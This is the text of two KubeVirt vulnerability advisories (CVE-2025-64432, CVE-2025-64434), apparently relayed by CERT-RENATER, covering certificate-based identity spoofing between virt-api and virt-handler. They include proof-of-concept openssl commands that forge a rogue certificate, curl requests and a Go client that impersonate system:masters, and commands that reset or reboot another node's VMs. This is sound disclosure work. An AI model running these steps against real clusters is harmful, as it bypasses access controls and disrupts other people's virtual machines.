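// verified client certificate (the chain verification itself is
// assumed to be done by the server's tls.Config).
package main

import "net/http"

var noAuthEndpoints = map[string]struct{}{
	"/":           {},
	"/apis":       {},
	"/healthz":    {},
	"/openapi/v2": {},
}

func withAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, open := noAuthEndpoints[r.URL.Path]; !open {
			if r.TLS == nil || len(r.TLS.PeerCertificates) == 0 {
				http.Error(w, "request is not authenticated", http.StatusUnauthorized)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}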

To illustrate the vulnerability and the attack scenario, a
certificate signed by the front-proxy-ca is generated below, issued
to an entity different from front-proxy-client (i.e. the certificate
has a different CN). It is then assumed that the attacker has
obtained access to this certificate bundle:

attacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key
attacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj "/CN=crypt0n1t3/O=Quarkslab/C=Fr"
attacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out rogue-front-proxy.crt -days 365

The authentication will now succeed:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  https://10.244.0.6:8443/v1
a valid user header is required for authorization

To fully exploit the vulnerability, the attacker must also
provide valid authentication HTTP headers:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H 'X-Remote-User:system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/v1
unknown api endpoint: /subresource.kubevirt.io/v1
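
The same impersonation request can also be issued programmatically.
Below is a minimal Go sketch, assuming the rogue-front-proxy.crt and
rogue-front-proxy.key files generated above are in the working
directory and that virt-api is reachable at 10.244.0.6:8443:

// Hypothetical client sketch reproducing the curl call above: present
// the rogue certificate and set the identity headers that virt-api
// trusts from its front proxy.
package main

import (
	"crypto/tls"
	"fmt"
	"io"
	"net/http"
)

func main() {
	cert, err := tls.LoadX509KeyPair("rogue-front-proxy.crt", "rogue-front-proxy.key")
	if err != nil {
		panic(err)
	}
	client := &http.Client{Transport: &http.Transport{
		TLSClientConfig: &tls.Config{
			Certificates:       []tls.Certificate{cert},
			InsecureSkipVerify: true, // equivalent of curl -k
		},
	}}
	req, _ := http.NewRequest(http.MethodGet, "https://10.244.0.6:8443/v1", nil)
	req.Header.Set("X-Remote-User", "system:kube-aggregator")
	req.Header.Set("X-Remote-Group", "system:masters")
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(body))
}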

The virt-api is a sub-resource extension server: it handles only
requests for specific resources and sub-resources (requests whose
URIs are prefixed with /apis/subresources.kubevirt.io/v1/). Most of
the requests it accepts are actually executed by the virt-handler
component and relate to the lifecycle of a VM.

Hence, virt-handler's API can be seen as aggregated within
virt-api's API, which in turn makes virt-api act as a proxy.

The endpoints which are handled by virt-api are listed in the
Swagger definitions available on GitHub @openapi-spec.


Resetting a Virtual Machine Instance

Consider the following deployed VirtualMachineInstance (VMI)
within the default namespace:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  namespace: default
  name: mishandling-common-name-in-certificate-default
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

An attacker with a stolen external authentication proxy certificate
could easily reset (hard reboot), freeze, or remove volumes from
the virtual machine.

root@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 16:43:26 GMT
Content-Length: 0


Impact

The virt-api component may allow an attacker to bypass existing
RBAC controls by directly communicating with the aggregated API
server, impersonating the Kubernetes API server and its aggregator
component.


Severity
Moderate
4.7 / 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64432

Weaknesses
Weakness CWE-287


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder


_____________________________________________________________________


Improper TLS Certificate Management Allows API Identity Spoofing
Moderate
stu-gott published GHSA-ggp9-c99x-54gp Nov 6, 2025

Package
No package listed

Affected versions
<= 1.5.3, <= 1.6.1, 1.7.0

Patched versions
None


Description

Summary

Due to improper TLS certificate management, a compromised
virt-handler could impersonate virt-api by using its own TLS
credentials, allowing it to initiate privileged operations against
another virt-handler.


Details

Because of improper TLS certificate management, a compromised
virt-handler instance can reuse its TLS bundle to impersonate
virt-api, enabling unauthorized access to VM lifecycle operations
on other virt-handler nodes.

The virt-api component acts as a sub-resource server and proxies
VM lifecycle API requests to virt-handler instances.
The communication between virt-api and virt-handler instances is
secured using mTLS: the former acts as the client, the latter as
the server. The client certificate used by virt-api is defined in
the source code as follows and has the following properties:

//pkg/virt-api/api.go

const (
	...
	defaultCAConfigMapName     = "kubevirt-ca"
  ...
	defaultHandlerCertFilePath = "/etc/virt-handler/clientcertificates/tls.crt"
	defaultHandlerKeyFilePath  = "/etc/virt-handler/clientcertificates/tls.key"
)

# verify virt-api's certificate properties from the docker container in which it is deployed using Minikube
admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'name=virt-api' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 127940157512425330 (0x1c688e539091f72)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

The virt-handler component verifies the signature of client
certificates against a self-signed root CA. The latter is generated
by virt-operator when the KubeVirt stack is deployed and stored in
a ConfigMap in the kubevirt namespace. This ConfigMap is used as a
trust anchor by all virt-handler instances to verify client
certificates.

# inspect the self-signed root CA used to sign virt-api's and
# virt-handler's certificates
admin@minikube:~$ kubectl -n kubevirt get configmap kubevirt-ca -o jsonpath='{.data.ca-bundle}' | openssl x509 -text | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 319368675363923930 (0x46ea01e3f7427da)
Issuer: CN=kubevirt.io@1747579138
Subject: CN=kubevirt.io@1747579138
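
As an illustration of how such a ConfigMap can serve as a trust
anchor, the following Go sketch (hypothetical, using client-go, and
not KubeVirt's actual code) loads the kubevirt-ca ConfigMap and
builds a certificate pool from its ca-bundle key:

// Hypothetical sketch: fetch the kubevirt-ca ConfigMap and turn its
// ca-bundle into an x509.CertPool usable for peer verification.
package main

import (
	"context"
	"crypto/x509"
	"fmt"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/rest"
)

func loadKubeVirtCA() (*x509.CertPool, error) {
	cfg, err := rest.InClusterConfig()
	if err != nil {
		return nil, err
	}
	cs, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		return nil, err
	}
	cm, err := cs.CoreV1().ConfigMaps("kubevirt").Get(context.TODO(), "kubevirt-ca", metav1.GetOptions{})
	if err != nil {
		return nil, err
	}
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM([]byte(cm.Data["ca-bundle"])) {
		return nil, fmt.Errorf("no certificate found in ca-bundle")
	}
	return pool, nil
}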

The kubevirt-ca is also used to sign the server certificate
which is used by a virt-handler instance:

admin@minikube:~$ openssl x509 -text -in \
$(CID=$(docker ps --filter 'name=virt-handler' --format '{{.ID}}' | head -n 1) && \
docker inspect $CID | grep "servercertificates:ro" | cut -d ":" -f1 | \
tr -d '"[:space:]')/tls.crt | \
grep -e "Subject:" -e "Issuer:" -e "Serial"

# the virt-handler's server certificate is issued by the same root CA
Serial Number: 7584450293644921758 (0x6941615ba1500b9e)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:node:virt-handler

In addition to the validity of the signature, the virt-handler
component also verifies the CN field of the presented
certificate:

//pkg/util/tls/tls.go

func SetupTLSForVirtHandlerServer(caManager ClientCAManager, certManager certificate.Manager, externallyManaged bool, clusterConfig *virtconfig.ClusterConfig) *tls.Config {
	// #nosec cause: InsecureSkipVerify: true
	// resolution: Neither the client nor the server should validate anything itself, `VerifyPeerCertificate` is still executed
	
	//...
				// XXX: We need to verify the cert ourselves because we don't have DNS or IP on the certs at the moment
				VerifyPeerCertificate: func(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
					return verifyPeerCert(rawCerts, externallyManaged, certPool, x509.ExtKeyUsageClientAuth, "client")
				},
				//...
}

func verifyPeerCert(rawCerts [][]byte, externallyManaged bool, certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {
  //...
	rawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]
	c, err := x509.ParseCertificate(rawPeer)
	//...
	fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
	if !externallyManaged && c.Subject.CommonName != fullCommonName {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
	}
	//...

The above code shows that client certificates accepted by
virt-handler must carry the CN kubevirt.io:system:client:virt-handler,
which is exactly the CN present in virt-api's client certificate.
However, virt-api is not the only component in the KubeVirt stack
that communicates with a virt-handler instance.

In addition to the extension API server, any other virt-handler
instance can communicate with a given virt-handler. This happens in
the context of VM migration operations: when a VM is migrated from
one node to another, the virt-handlers on both nodes use a structure
called ProxyManager to exchange the state of the migration.

//pkg/virt-handler/migration-proxy/migration-proxy.go

func NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {
	return &migrationProxyManager{
		sourceProxies:   make(map[string][]*migrationProxy),
		targetProxies:   make(map[string][]*migrationProxy),
		serverTLSConfig: serverTLSConfig,
		clientTLSConfig: clientTLSConfig,
		config:          config,
	}
}

This communication follows a classical client-server model: the
virt-handler on the migration source node acts as the client and
the virt-handler on the migration destination node acts as the
server. This communication is also secured using mTLS. The server
certificate presented by the destination virt-handler is the same
one used for the communication with virt-api in the context of VM
lifecycle operations (CN=kubevirt.io:system:node:virt-handler).
However, the client certificate used by a virt-handler instance has
the same CN as the client certificate used by virt-api.

admin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter 'name=virt-handler' --format '{{.ID}}' | head -n 1) && docker inspect $CID | grep "clientcertificates:ro" | cut -d ":" -f1 | tr -d '"[:space:]')/tls.crt | grep -e "Subject:" -e "Issuer:" -e "Serial"

Serial Number: 2951695854686290384 (0x28f687bdb791c1d0)
Issuer: CN = kubevirt.io@1747579138
Subject: CN = kubevirt.io:system:client:virt-handler

Although the migration procedure, in which two separate virt-handler
instances coordinate the transfer of a VM's state, is not directly
tied to the communication between virt-api and virt-handler during
VM lifecycle management, there is a critical overlap in the TLS
authentication mechanism. Specifically, the client certificates used
by virt-handler and virt-api share the same CN field, even though
the two types of communication use different, randomly allocated
ports.
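
The consequence can be illustrated with a simplified Go sketch of the
CN comparison performed by verifyPeerCert (not KubeVirt's actual
code): since virt-api's client certificate and every virt-handler's
client certificate carry the very same CN, the check cannot
distinguish the two components:

// Simplified illustration of the CN check applied to client
// certificates; both certificates below pass it.
package main

import "fmt"

func verifyClientCN(presentedCN string) error {
	expected := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", "client")
	if presentedCN != expected {
		return fmt.Errorf("common name is invalid, expected %s, but got %s", expected, presentedCN)
	}
	return nil
}

func main() {
	// CN taken from virt-api's client certificate.
	fmt.Println(verifyClientCN("kubevirt.io:system:client:virt-handler")) // <nil>: accepted
	// CN taken from a (potentially compromised) virt-handler's client certificate.
	fmt.Println(verifyClientCN("kubevirt.io:system:client:virt-handler")) // <nil>: accepted as well
}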


PoC

To illustrate the vulnerability, a Minikube cluster has been
deployed with two nodes (minikube and minikube-m02), and thus with
two virt-handler instances, alongside a VMI running on one of the
nodes. It is assumed that an attacker has obtained access to the
client certificate bundle used by the virt-handler instance running
on the compromised node (minikube), while the virtual machine is
running on the other node (minikube-m02). The attacker can therefore
interact with the sub-resource API exposed by the other virt-handler
instance and control the lifecycle of the VMs running on that node:

# the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
    kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0
# get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

# soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted
# the VMI mishandling-common-name-in-certificate-handler has been rebooted


Impact

Due to the peer verification logic in virt-handler (via
verifyPeerCert), an attacker who compromises a virt-handler
instance could exploit these shared credentials to impersonate
virt-api and execute privileged operations against other
virt-handler instances, potentially compromising the integrity
and availability of the VMs they manage.


Severity
Moderate
4.7 / 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64434

Weaknesses
Weakness CWE-287


Credits

    @mihailkirov mihailkirov Finder
    @Faeris95 Faeris95 Finder



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




